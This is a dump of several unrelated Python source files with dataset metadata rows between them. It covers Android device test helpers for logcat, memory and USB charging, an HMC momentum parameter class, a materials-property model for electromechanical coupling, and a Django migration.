  return '\n'.join(self.RunShellCommand('dumpsys iphonesubinfo'))
def GetBatteryInfo(self):
  """Returns a {str: str} dict of battery info (e.g. status, level, etc)."""
  battery = self.RunShellCommand('dumpsys battery')
  assert battery
  # Skip the header line; the rest look like '  level: 80'.
  return {key.strip(): value.strip()
          for key, _, value in (line.partition(': ')
                                for line in battery[1:])}
def GetSetupWizardStatus(self):
  """Returns the status of the device setup wizard (e.g. DISABLED)."""
  # On some devices, the status is empty if not otherwise set. In such cases
  # the caller should expect an empty string to be returned.
  return self.system_properties['ro.setupwizard.mode']
def StartMonitoringLogcat(self, clear=True, logfile=None, filters=None):
  """Starts monitoring the output of logcat, for use with WaitForLogMatch.

  Args:
    clear: If True the existing logcat output will be cleared, to avoiding
           matching historical output lurking in the log.
    logfile: (optional) file object to which pexpect also writes the logcat
             output (wrapped in NewLineNormalizer below).
    filters: A list of logcat filters to be used.
  """
  if clear:
    self.RunShellCommand('logcat -c')
  args = []
  # Forward any device-targeting flags (-s SERIAL etc.) to the spawned adb.
  if self._adb._target_arg:
    args += shlex.split(self._adb._target_arg)
  args += ['logcat', '-v', 'threadtime']
  if filters:
    args.extend(filters)
  else:
    args.append('*:v')

  if logfile:
    logfile = NewLineNormalizer(logfile)

  # Spawn logcat and synchronize with it. Up to 4 attempts; the spawned
  # process is closed and recreated whenever synchronization fails.
  for _ in range(4):
    self._logcat = pexpect.spawn(constants.GetAdbPath(), args, timeout=10,
                                 logfile=logfile)
    if not clear or self.SyncLogCat():
      break
    self._logcat.close(force=True)
  else:
    # for/else: all 4 attempts failed to synchronize.
    logging.critical('Error reading from logcat: ' + str(self._logcat.match))
    sys.exit(1)
def SyncLogCat(self):
  """Synchronize with logcat.

  Synchronize with the monitored logcat so that WaitForLogMatch will only
  consider new message that are received after this point in time.

  Returns:
    True if the synchronization succeeded.
  """
  assert self._logcat
  # Log a unique tag and wait for it to appear in the monitored stream;
  # expect() returns 0 when the first pattern (our tag) matched, 1/2 for
  # EOF/TIMEOUT respectively.
  tag = 'logcat_sync_%s' % time.time()
  self.RunShellCommand('log ' + tag)
  return self._logcat.expect([tag, pexpect.EOF, pexpect.TIMEOUT]) == 0
def GetMonitoredLogCat(self):
  """Returns an "adb logcat" command as created by pexpected.spawn."""
  # Lazily start monitoring (without clearing the log) on first use.
  if not self._logcat:
    self.StartMonitoringLogcat(clear=False)
  return self._logcat
  def WaitForLogMatch(self, success_re, error_re, clear=False, timeout=10):
    """Blocks until a matching line is logged or a timeout occurs.

    Args:
      success_re: A compiled re to search each line for.
      error_re: A compiled re which, if found, terminates the search for
          |success_re|. If None is given, no error condition will be detected.
      clear: If True the existing logcat output will be cleared, defaults to
          false.
      timeout: Timeout in seconds to wait for a log match.

    Raises:
      pexpect.TIMEOUT after |timeout| seconds without a match for |success_re|
      or |error_re|.

    Returns:
      The re match object if |success_re| is matched first or None if |error_re|
      is matched first.
    """
    logging.info('<<< Waiting for logcat:' + str(success_re.pattern))
    t0 = time.time()
    while True:
      if not self._logcat:
        self.StartMonitoringLogcat(clear)
      try:
        while True:
          # Note this will block for up to the timeout _per log line_, so we
          # need to calculate the overall timeout remaining since t0.
          time_remaining = t0 + timeout - time.time()
          if time_remaining < 0:
            raise pexpect.TIMEOUT(self._logcat)
          self._logcat.expect(PEXPECT_LINE_RE, timeout=time_remaining)
          line = self._logcat.match.group(1)
          if error_re:
            error_match = error_re.search(line)
            if error_match:
              return None
          success_match = success_re.search(line)
          if success_match:
            return success_match
          logging.info('<<< Skipped Logcat Line:' + str(line))
      except pexpect.TIMEOUT:
        # Re-raise with a human-readable message instead of the raw child.
        raise pexpect.TIMEOUT(
            'Timeout (%ds) exceeded waiting for pattern "%s" (tip: use -vv '
            'to debug)' %
            (timeout, success_re.pattern))
      except pexpect.EOF:
        # It seems that sometimes logcat can end unexpectedly. This seems
        # to happen during Chrome startup after a reboot followed by a cache
        # clean. I don't understand why this happens, but this code deals with
        # it by respawning logcat and retrying via the enclosing while loop.
        logging.critical('Found EOF in adb logcat. Restarting...')
        # NOTE(review): args[1:] presumably skips the adb binary recorded as
        # argv[0] by pexpect; GetAdbPath() is re-supplied explicitly.
        self._logcat = pexpect.spawn(constants.GetAdbPath(),
                                     self._logcat.args[1:],
                                     timeout=self._logcat.timeout,
                                     logfile=self._logcat.logfile)
  def StartRecordingLogcat(self, clear=True, filters=None):
    """Starts recording logcat output to eventually be saved as a string.

    This call should come before some series of tests are run, with either
    StopRecordingLogcat or SearchLogcatRecord following the tests.

    Args:
      clear: True if existing log output should be cleared.
      filters: A list of logcat filters to be used.
    """
    if not filters:
      filters = ['*:v']
    if clear:
      self._adb.SendCommand('logcat -c')
    logcat_command = 'adb %s logcat -v threadtime %s' % (self._adb._target_arg,
                                                         ' '.join(filters))
    # bufsize=0 (Python 2 parameter name) keeps the temp file unbuffered so
    # GetCurrentRecordedLogcat can observe output while recording continues.
    self._logcat_tmpoutfile = tempfile.NamedTemporaryFile(bufsize=0)
    # The recorder runs through a shell so the composed command string works.
    self.logcat_process = subprocess.Popen(logcat_command, shell=True,
                                           stdout=self._logcat_tmpoutfile)
def GetCurrentRecordedLogcat(self):
"""Return the current content of the logcat being recorded.
Call this after StartRecordingLogcat() and before StopRecordingLogcat().
This can be useful to perform timed polling/parsing.
Returns:
Current logcat output as a single string, or None if
StopRecordingLogcat() was already called.
"""
if not self._logcat_tmpoutfile:
return None
with open(self._logcat_tmpoutfile.name) as f:
return f.read()
  def StopRecordingLogcat(self):
    """Stops an existing logcat recording subprocess and returns output.

    Returns:
      The logcat output as a string or an empty string if logcat was not
      being recorded at the time.
    """
    if not self.logcat_process:
      return ''
    # Cannot evaluate directly as 0 is a possible value.
    # Better to read the self.logcat_process.stdout before killing it,
    # Otherwise the communicate may return incomplete output due to pipe break.
    if self.logcat_process.poll() is None:
      self.logcat_process.kill()
    self.logcat_process.wait()
    self.logcat_process = None
    # Drain the temp file that captured stdout, then drop the handle so
    # GetCurrentRecordedLogcat knows recording has ended.
    self._logcat_tmpoutfile.seek(0)
    output = self._logcat_tmpoutfile.read()
    self._logcat_tmpoutfile.close()
    self._logcat_tmpoutfile = None
    return output
@staticmethod
def SearchLogcatRecord(record, message, thread_id=None, proc_id=None,
log_level=None, component=None):
"""Searches the specified logcat output and returns results.
This method searches through the logcat output specified by record for a
certain message, narrowing results by matching them against any other
specified criteria. It returns all matching lines as described below.
Args:
record: A string generated by Start/StopRecordingLogcat to search.
message: An output string to search for.
thread_id: The thread id that is the origin of the message.
proc_id: The process that is the origin of the message.
log_level: The log level of the message.
component: The name of the component that would create the message.
Returns:
A list of dictionaries represeting matching entries, each containing keys
thread_id, proc_id, log_level, component, and message.
"""
if thread_id:
thread_id = str(thread_id)
if proc_id:
proc_id = str(proc_id)
results = []
reg = re.compile('(\d+)\s+(\d+)\s+([A-Z])\s+([A-Za-z]+)\s*:(.*)$',
re.MULTILINE)
log_list = reg.findall(record)
for (tid, pid, log_lev, comp, msg) in log_list:
if ((not thread_id or thread_id == tid) and
(not proc_id or proc_id == pid) and
(not log_level or log_level == log_lev) and
(not component or component == comp) and msg.find(message) > -1):
match = dict({'thread_id': tid, 'proc_id': pid,
'log_level': log_lev, 'component': comp,
'message': msg})
results.append(match)
return results
def ExtractPid(self, process_name):
"""Extracts Process Ids for a given process name from Android Shell.
Args:
process_name: name of the process on the device.
Returns:
List of all the process ids (as strings) that match the given name.
If the name of a process exactly matches the given name, the pid of
that process will be inserted to the front of the pid list.
"""
pids = []
for line in self.RunShellCommand('ps', log_result=False):
data = line.split()
try:
if process_name in data[-1]: # name is in the last column
if process_name == data[-1]:
pids.insert(0, data[1]) # PID is in the second column
else:
pids.append(data[1])
except IndexError:
pass
return pids
  def GetIoStats(self):
    """Gets cumulative disk IO stats since boot (for all processes).

    Returns:
      Dict of {num_reads, num_writes, read_ms, write_ms} or None if there
      was an error.
    """
    # Field names follow the /proc/diskstats column layout.
    IoStats = collections.namedtuple(
        'IoStats',
        ['device',
         'num_reads_issued',
         'num_reads_merged',
         'num_sectors_read',
         'ms_spent_reading',
         'num_writes_completed',
         'num_writes_merged',
         'num_sectors_written',
         'ms_spent_writing',
         'num_ios_in_progress',
         'ms_spent_doing_io',
         'ms_spent_doing_io_weighted',
        ])
    for line in self.GetFileContents('/proc/diskstats', log_result=False):
      fields = line.split()
      # Field 2 is the device name; fields 3+ are the numeric counters.
      stats = IoStats._make([fields[2]] + [int(f) for f in fields[3:]])
      if stats.device == 'mmcblk0':
        # Only the 'mmcblk0' device (internal storage) is reported.
        return {
            'num_reads': stats.num_reads_issued,
            'num_writes': stats.num_writes_completed,
            'read_ms': stats.ms_spent_reading,
            'write_ms': stats.ms_spent_writing,
        }
    logging.warning('Could not find disk IO stats.')
    return None
  def GetMemoryUsageForPid(self, pid):
    """Returns the memory usage for given pid.

    Args:
      pid: The pid number of the specific process running on device.

    Returns:
      Dict of {metric:usage_kb}, for the process which has specified pid.
      The metric keys which may be included are: Size, Rss, Pss, Shared_Clean,
      Shared_Dirty, Private_Clean, Private_Dirty, VmHWM.
      An empty dict is returned when showmap output cannot be parsed.
    """
    showmap = self.RunShellCommand('showmap %d' % pid)
    if not showmap or not showmap[-1].endswith('TOTAL'):
      logging.warning('Invalid output for showmap %s', str(showmap))
      return {}
    items = showmap[-1].split()
    # The TOTAL line must carry eight numeric columns plus the 'TOTAL' label.
    if len(items) != 9:
      logging.warning('Invalid TOTAL for showmap %s', str(items))
      return {}
    usage_dict = collections.defaultdict(int)
    usage_dict.update({
        'Size': int(items[0].strip()),
        'Rss': int(items[1].strip()),
        'Pss': int(items[2].strip()),
        'Shared_Clean': int(items[3].strip()),
        'Shared_Dirty': int(items[4].strip()),
        'Private_Clean': int(items[5].strip()),
        'Private_Dirty': int(items[6].strip()),
    })
    peak_value_kb = 0
    # VmHWM (peak resident size) comes from /proc/<pid>/status, not showmap.
    for line in self.GetProtectedFileContents('/proc/%s/status' % pid):
      if not line.startswith('VmHWM:'):  # Format: 'VmHWM:  +[0-9]+ kB'
        continue
      peak_value_kb = int(line.split(':')[1].strip().split(' ')[0])
      break
    usage_dict['VmHWM'] = peak_value_kb
    if not peak_value_kb:
      logging.warning('Could not find memory peak value for pid ' + str(pid))
    return usage_dict
  def ProcessesUsingDevicePort(self, device_port):
    """Lists processes using the specified device port on loopback interface.

    Args:
      device_port: Port on device we want to check.

    Returns:
      A list of (pid, process_name) tuples using the specified port.
    """
    tcp_results = self.RunShellCommand('cat /proc/net/tcp', log_result=False)
    # /proc/net/tcp shows addresses as HEXIP:HEXPORT; 0100007F is 127.0.0.1.
    tcp_address = '0100007F:%04X' % device_port
    pids = []
    for single_connect in tcp_results:
      connect_results = single_connect.split()
      # Column 1 is the TCP port, and Column 9 is the inode of the socket
      if connect_results[1] == tcp_address:
        socket_inode = connect_results[9]
        socket_name = 'socket:[%s]' % socket_inode
        # Cross-reference the socket inode against lsof's open-file list.
        lsof_results = self.RunShellCommand('lsof', log_result=False)
        for single_process in lsof_results:
          process_results = single_process.split()
          # Ignore the line if it has less than nine columns in it, which may
          # be the case when a process stops while lsof is executing.
          if len(process_results) <= 8:
            continue
          # Column 0 is the executable name
          # Column 1 is the pid
          # Column 8 is the Inode in use
          if process_results[8] == socket_name:
            pids.append((int(process_results[1]), process_results[0]))
            break
    logging.info('PidsUsingDevicePort: %s', pids)
    return pids
  def FileExistsOnDevice(self, file_name):
    """Checks whether the given file exists on the device.

    Args:
      file_name: Full path of file to check.

    Returns:
      True if the file exists, False otherwise.

    Raises:
      errors.DeviceUnresponsiveError: if the shell returned non-numeric
          output while the device still appears attached.
    """
    assert '"' not in file_name, 'file_name cannot contain double quotes'
    try:
      status = self._adb.SendShellCommand(
          '\'test -e "%s"; echo $?\'' % (file_name))
      if 'test: not found' not in status:
        return int(status) == 0
      # Fall back to ls when the device lacks the 'test' binary.
      status = self._adb.SendShellCommand(
          '\'ls "%s" >/dev/null 2>&1; echo $?\'' % (file_name))
      return int(status) == 0
    except ValueError:
      # int() failed: the shell echoed something other than an exit code.
      if IsDeviceAttached(self._device):
        raise errors.DeviceUnresponsiveError('Device may be offline.')
      return False
  def IsFileWritableOnDevice(self, file_name):
    """Checks whether the given file (or directory) is writable on the device.

    Args:
      file_name: Full path of file/directory to check.

    Returns:
      True if writable, False otherwise.

    Raises:
      errors.AbortError: if the device has no 'test' binary (OS too old —
          unlike FileExistsOnDevice there is no ls fallback here).
      errors.DeviceUnresponsiveError: if the shell returned non-numeric
          output while the device still appears attached.
    """
    assert '"' not in file_name, 'file_name cannot contain double quotes'
    try:
      status = self._adb.SendShellCommand(
          '\'test -w "%s"; echo $?\'' % (file_name))
      if 'test: not found' not in status:
        return int(status) == 0
      raise errors.AbortError('"test" binary not found. OS too old.')
    except ValueError:
      # int() failed: the shell echoed something other than an exit code.
      if IsDeviceAttached(self._device):
        raise errors.DeviceUnresponsiveError('Device may be offline.')
      return False
@staticmethod
def GetTimestamp():
return time.strftime('%Y-%m-%d-%H%M%S', time.localtime())
@staticmethod
def EnsureHostDirectory(host_file):
host_dir = os.path.dirname(os.path.abspath(host_file))
if not os.path.exists(host_dir):
os.makedirs(host_dir)
  def TakeScreenshot(self, host_file=None):
    """Saves a screenshot image to |host_file| on the host.

    Args:
      host_file: Absolute path to the image file to store on the host or None
          to use an autogenerated file name.

    Returns:
      Resulting host file name of the screenshot.
    """
    host_file = os.path.abspath(host_file or
                                'screenshot-%s.png' % self.GetTimestamp())
    self.EnsureHostDirectory(host_file)
    # Capture to external storage on the device, then pull to the host.
    device_file = '%s/screenshot.png' % self.GetExternalStorage()
    self.RunShellCommand(
        '/system/bin/screencap -p %s' % device_file)
    self.PullFileFromDevice(device_file, host_file)
    # Remove the temporary capture from the device.
    self.RunShellCommand('rm -f "%s"' % device_file)
    return host_file
  def PullFileFromDevice(self, device_file, host_file):
    """Download |device_file| from the device to |host_file| on the host.

    Args:
      device_file: Absolute path to the file to retrieve from the device.
      host_file: Absolute path to the file to store on the host.

    Raises:
      device_errors.AdbCommandFailedError: if 'adb pull' reports failure.
    """
    if not self._adb.Pull(device_file, host_file):
      raise device_errors.AdbCommandFailedError(
          ['pull', device_file, host_file], 'Failed to pull file from device.')
    assert os.path.exists(host_file)
  def SetUtilWrapper(self, util_wrapper):
    """Sets a wrapper prefix to be used when running a locally-built
    binary on the device (ex.: md5sum_bin).

    Args:
      util_wrapper: Command-prefix string prepended to such invocations.
    """
    self._util_wrapper = util_wrapper
  def RunUIAutomatorTest(self, test, test_package, timeout):
    """Runs a single uiautomator test.

    Args:
      test: Test class/method.
      test_package: Name of the test jar.
      timeout: Timeout time in seconds.

    Returns:
      An instance of am_instrument_parser.TestResult object.

    Raises:
      errors.InstrumentationError: if no test result could be parsed from
          the uiautomator output.
    """
    cmd = 'uiautomator runtest %s -e class %s' % (test_package, test)
    self._LogShell(cmd)
    output = self._adb.SendShellCommand(cmd, timeout_time=timeout)
    # uiautomator doesn't fully conform to the instrumentation test runner
    # output protocol, so several results may be parsed from a single run.
    # Just assume the first result is valid.
    (test_results, _) = am_instrument_parser.ParseAmInstrumentOutput(output)
    if not test_results:
      raise errors.InstrumentationError(
          'no test results... device setup correctly?')
    return test_results[0]
  def DismissCrashDialogIfNeeded(self):
    """Dismiss the error/ANR dialog if present.

    Returns: Name of the crashed package if a dialog is focused,
             None otherwise.
    """
    # Matches dumpsys window output for a focused crash or ANR dialog;
    # group 2 captures the offending package name.
    re_focus = re.compile(
        r'\s*mCurrentFocus.*Application (Error|Not Responding): (\S+)}')

    def _FindFocusedWindow():
      # Returns the regex match for a focused crash/ANR window, or None.
      match = None
      for line in self.RunShellCommand('dumpsys window windows'):
        match = re.match(re_focus, line)
        if match:
          break
      return match

    match = _FindFocusedWindow()
    if not match:
      return
    package = match.group(2)
    logging.warning('Trying to dismiss %s dialog for %s' % match.groups())
    # Navigate to the dialog's confirm button and press it.
    self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
    self.SendKeyEvent(KEYCODE_DPAD_RIGHT)
    self.SendKeyEvent(KEYCODE_ENTER)
    # Re-check: the dialog may survive the key events.
    match = _FindFocusedWindow()
    if match:
      logging.error('Still showing a %s dialog for %s' % match.groups())
    return package
  def EfficientDeviceDirectoryCopy(self, source, dest):
    """ Copy a directory efficiently on the device

    Uses a shell script running on the target to copy new and changed files
    from the source directory to the destination directory and remove added
    files. This is in some cases much faster than cp -r.

    Args:
      source: absolute path of source directory
      dest: absolute path of destination directory
    """
    logging.info('In EfficientDeviceDirectoryCopy %s %s', source, dest)
    with DeviceTempFile(self, suffix=".sh") as temp_script_file:
      host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
                                      'build',
                                      'android',
                                      'pylib',
                                      'efficient_android_directory_copy.sh')
      # Push the helper script into a device temp file and execute it there.
      self._adb.Push(host_script_path, temp_script_file.name)
      out = self.RunShellCommand(
          'sh %s %s %s' % (temp_script_file.name, source, dest),
          timeout_time=120)
      if self._device:
        device_repr = self._device[-4:]
      else:
        device_repr = '????'
      # Echo script output tagged with the last 4 chars of the device serial.
      for line in out:
        logging.info('[%s]> %s', device_repr, line)
  def _GetControlUsbChargingCommand(self):
    """Finds and caches the USB-charging control commands for this device.

    Returns:
      The matching entry from CONTROL_USB_CHARGING_COMMANDS (a dict holding
      'enable_command', 'disable_command' and 'witness_file'), or None if
      root is unavailable or no known witness file exists on the device.
    """
    # The lookup is cached even when it yields None, to avoid re-probing.
    if self._control_usb_charging_command['cached']:
      return self._control_usb_charging_command['command']
    self._control_usb_charging_command['cached'] = True
    if not self.IsRootEnabled():
      return None
    for command in CONTROL_USB_CHARGING_COMMANDS:
      # Assert command is valid.
      assert 'disable_command' in command
      assert 'enable_command' in command
      assert 'witness_file' in command
      witness_file = command['witness_file']
      if self.FileExistsOnDevice(witness_file):
        self._control_usb_charging_command['command'] = command
        return command
    return None
def CanControlUsbCharging(self):
return self._GetControlUsbChargingCommand() is not None
  def DisableUsbCharging(self, timeout=10):
    """Disables USB charging, retrying until the device stops charging.

    Args:
      timeout: Seconds to keep retrying before giving up.

    Raises:
      Exception: if no USB-charging control interface is available.
      pexpect.TIMEOUT: if the device still reports charging after |timeout|.
    """
    command = self._GetControlUsbChargingCommand()
    if not command:
      raise Exception('Unable to act on usb charging.')
    disable_command = command['disable_command']
    t0 = time.time()
    # Do not loop directly on self.IsDeviceCharging to cut the number of calls
    # to the device.
    while True:
      if t0 + timeout - time.time() < 0:
        raise pexpect.TIMEOUT('Unable to disable USB charging in time: %s' % (
            self.GetBatteryInfo()))
      self.RunShellCommand(disable_command)
      if not self.IsDeviceCharging():
        break
def EnableUsbCharging(self, timeout=10):
command = self._GetControlUsbChargingCommand()
if not command:
raise Exception('Unable to act on usb charging.')
disable_command = command['enable_command']
t0 = time.time()
# Do not loop directly on self.IsDeviceCharging to cut the number of calls
# to the device.
while True:
if t0 + timeout - time.time() < 0:
raise pexpect.TIMEOUT('Unable to enable USB charging in time.')
self.RunShellCommand(disable_command)
if self.IsDeviceCharging():
break
def IsDeviceCharging(self):
for line in self.RunShellCommand('dumpsys battery'):
if 'powered: ' in line:
if line.split('powered: ')[1] == 'true':
return True
class NewLineNormalizer(object):
  """A file-like wrapper that collapses '\r\r\n' sequences to '\n'.

  Pexpect runs adb within a pseudo-tty device (see
  http://www.noah.org/wiki/pexpect), so every '\n' adb prints is written to
  the logfile as '\r\n'; adb itself already terminates lines with '\r\n',
  leaving '\r\r\n' at the end of each logged line. Instances sit in front
  of a real output object and rewrite that sequence before delegating.
  """

  def __init__(self, output):
    # Underlying file-like object that receives the normalized text.
    self._output = output

  def write(self, data):
    normalized = data.replace('\r\r\n', '\n')
    self._output.write(normalized)

  def flush(self):
    self._output.flush()
| false
| true
|
f719218d3fe98d1455ee9174e8b9c5286ddf7b15
| 670
|
py
|
Python
|
src/LocalChoiceModel/vel_param.py
|
noashin/local_global_attention_model
|
531e6a4cc1dc364a6a4168de1b9f972727a8aeb1
|
[
"MIT"
] | null | null | null |
src/LocalChoiceModel/vel_param.py
|
noashin/local_global_attention_model
|
531e6a4cc1dc364a6a4168de1b9f972727a8aeb1
|
[
"MIT"
] | null | null | null |
src/LocalChoiceModel/vel_param.py
|
noashin/local_global_attention_model
|
531e6a4cc1dc364a6a4168de1b9f972727a8aeb1
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
    """Auxiliary momentum ("velocity") parameter for HMC sampling.

    The momentum is drawn from a Gaussian, so its kinetic energy is
    v.v / 2 and the gradient of that energy with respect to v is v itself.
    """

    def __init__(self, init_val):
        init_array = np.array(init_val)
        super().__init__(init_array)
        # Standard-normal proposal parameters matching the initial shape.
        self.mu = np.zeros(init_array.shape)
        self.sigma = 1

    def gen_init_value(self):
        """Draw a fresh momentum sample from N(mu, sigma)."""
        self.value = multivariate_normal.rvs(self.mu, self.sigma)

    def get_energy_grad(self):
        """Gradient of the kinetic energy w.r.t. the current momentum."""
        return self.value

    def get_energy(self):
        """Kinetic energy of the current momentum."""
        return np.dot(self.value, self.value) / 2

    def get_energy_for_value(self, value):
        """Kinetic energy that an arbitrary momentum vector would have."""
        return np.dot(value, value) / 2
| 24.814815
| 65
| 0.665672
|
import sys
import numpy as np
from scipy.stats import multivariate_normal
sys.path.append('./../../')
from src.HMC.hmcparameter import HMCParameter
class VelParam(HMCParameter):
def __init__(self, init_val):
super().__init__(np.array(init_val))
dim = np.array(init_val).shape
self.mu = np.zeros(dim)
self.sigma = 1
def gen_init_value(self):
self.value = multivariate_normal.rvs(self.mu, self.sigma)
def get_energy_grad(self):
return self.value
def get_energy(self):
return np.dot(self.value, self.value) / 2
def get_energy_for_value(self, value):
return np.dot(value, value) / 2
| true
| true
|
f719245ed4a4fb729ba07d5a218d16d0af49e06d
| 1,972
|
py
|
Python
|
propnet/models/python/electromechanical_coupling.py
|
ruriboshi/propnet
|
770703fb4fc344f785f89c02f26b31ea5733d2bd
|
[
"BSD-3-Clause-LBNL"
] | 57
|
2018-01-09T14:56:20.000Z
|
2022-02-24T11:44:42.000Z
|
propnet/models/python/electromechanical_coupling.py
|
ruriboshi/propnet
|
770703fb4fc344f785f89c02f26b31ea5733d2bd
|
[
"BSD-3-Clause-LBNL"
] | 214
|
2017-09-26T23:31:09.000Z
|
2022-03-14T04:50:58.000Z
|
propnet/models/python/electromechanical_coupling.py
|
ruriboshi/propnet
|
770703fb4fc344f785f89c02f26b31ea5733d2bd
|
[
"BSD-3-Clause-LBNL"
] | 26
|
2017-10-29T21:34:22.000Z
|
2022-01-12T05:59:12.000Z
|
import numpy as np
def plug_in(symbol_values):
    """Compute the electromechanical coupling factor from tensor components.

    Args:
        symbol_values: Mapping that may contain "S" (compliance tensor,
            Voigt), "e" (dielectric tensor) and "d" (converse piezoelectric
            tensor), each indexable as nested sequences.

    Returns:
        {"k": coupling factor} when all three tensors are present,
        otherwise an empty dict.
    """
    data = {}
    required = ("S", "e", "d")
    if all(name in symbol_values for name in required):
        compliance = symbol_values["S"]
        dielectric = symbol_values["e"]
        piezo = symbol_values["d"]
        # k = |d_33| / sqrt(e_33 * S_33), built from the [2][2] components.
        data["k"] = np.abs(
            piezo[2][2] / np.sqrt(dielectric[2][2] * compliance[2][2]))
    return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| 32.866667
| 111
| 0.573022
|
import numpy as np
def plug_in(symbol_values):
req_symbols = ["S", "e", "d"]
data = {}
if all(s in symbol_values for s in req_symbols):
e = symbol_values["e"]
S = symbol_values["S"]
d = symbol_values["d"]
data["k"] = np.abs(d[2][2] / np.sqrt(e[2][2] * S[2][2]))
return data
DESCRIPTION = """
Model calculating the electromechanical coupling factor,
which is the efficiency of converting eletrical energy
to acoustic energy in a piezoeletric transducer or filter
"""
test_data = [{
"inputs": {
"S": [[0.007482236755310126, -0.002827041595205337, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.002827041595205337, 0.007482236755310125, -0.002827041595205337, 0.0, 0.0, 0.0],
[-0.0028270415952053366, -0.002827041595205337, 0.007482236755310125, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.010309278350515464, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.010309278350515464, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.010309278350515464]],
"e": [[18.65, 0.00, 0.00], [-0.00, 18.65, 0.00], [-0.00, 0.00, 7.88]],
"d": [[-0.0412497, -0.28686697, 0.06342802], [0.05065159, 0.26064878, -0.04828778],
[0.08828203, 0.5660897, -0.11520665], [-0.16218673, -0.92468949, 0.2109461],
[0.02485558, 0.03232004, -0.02421919], [0.06636329, 0.46541895, -0.09526407]]
},
"outputs": {
"k": 0.47445902984
}
}]
config = {
"name": "electromechanical_coupling",
"connections": [{
"inputs": ["e", "S", "d"],
"outputs": ["k"]
}],
"categories": ["mechanical", "electrical"],
"variable_symbol_map": {
"S": "compliance_tensor_voigt",
"e": "dielectric_tensor",
"d": "piezoelectric_tensor_converse",
"k": "electromechanical_coupling"
},
"description": DESCRIPTION,
"implemented_by": ["shyamd"],
"references": [],
"plug_in": plug_in,
"test_data": test_data
}
| true
| true
|
f7192509abdc2fa2929bd17b5a5b981950b115dd
| 875
|
py
|
Python
|
forum/migrations/0008_auto_20180116_0137.py
|
SH-anonta/Discussion-Forum
|
03c92916d4dd708ad76e0aa945aaecacb1eac30e
|
[
"MIT"
] | null | null | null |
forum/migrations/0008_auto_20180116_0137.py
|
SH-anonta/Discussion-Forum
|
03c92916d4dd708ad76e0aa945aaecacb1eac30e
|
[
"MIT"
] | null | null | null |
forum/migrations/0008_auto_20180116_0137.py
|
SH-anonta/Discussion-Forum
|
03c92916d4dd708ad76e0aa945aaecacb1eac30e
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.1 on 2018-01-15 19:37
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Replaces the app's custom ``User`` model with a ``UserProfile`` that
    links one-to-one to the configured auth user model."""

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('forum', '0007_auto_20180113_1812'),
    ]

    operations = [
        # New profile table; initially holds only its primary key.
        migrations.CreateModel(
            name='UserProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        # Drop the old custom User model entirely (data in it is lost).
        migrations.DeleteModel(
            name='User',
        ),
        # Tie each profile to a settings.AUTH_USER_MODEL row; deleting the
        # user cascades to the profile.
        migrations.AddField(
            model_name='userprofile',
            name='user',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| 28.225806
| 114
| 0.618286
|
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('forum', '0007_auto_20180113_1812'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='User',
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| true
| true
|
f719250ed98ee5f352d386094fce8e0557ce50cb
| 4,716
|
py
|
Python
|
pylenium/scripts/report_portal.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 169
|
2020-03-16T15:04:42.000Z
|
2022-03-31T18:53:41.000Z
|
pylenium/scripts/report_portal.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 163
|
2020-03-15T06:33:54.000Z
|
2022-03-31T21:37:09.000Z
|
pylenium/scripts/report_portal.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 26
|
2020-03-28T05:43:22.000Z
|
2022-02-11T16:46:34.000Z
|
""" ReportPortal.io integration
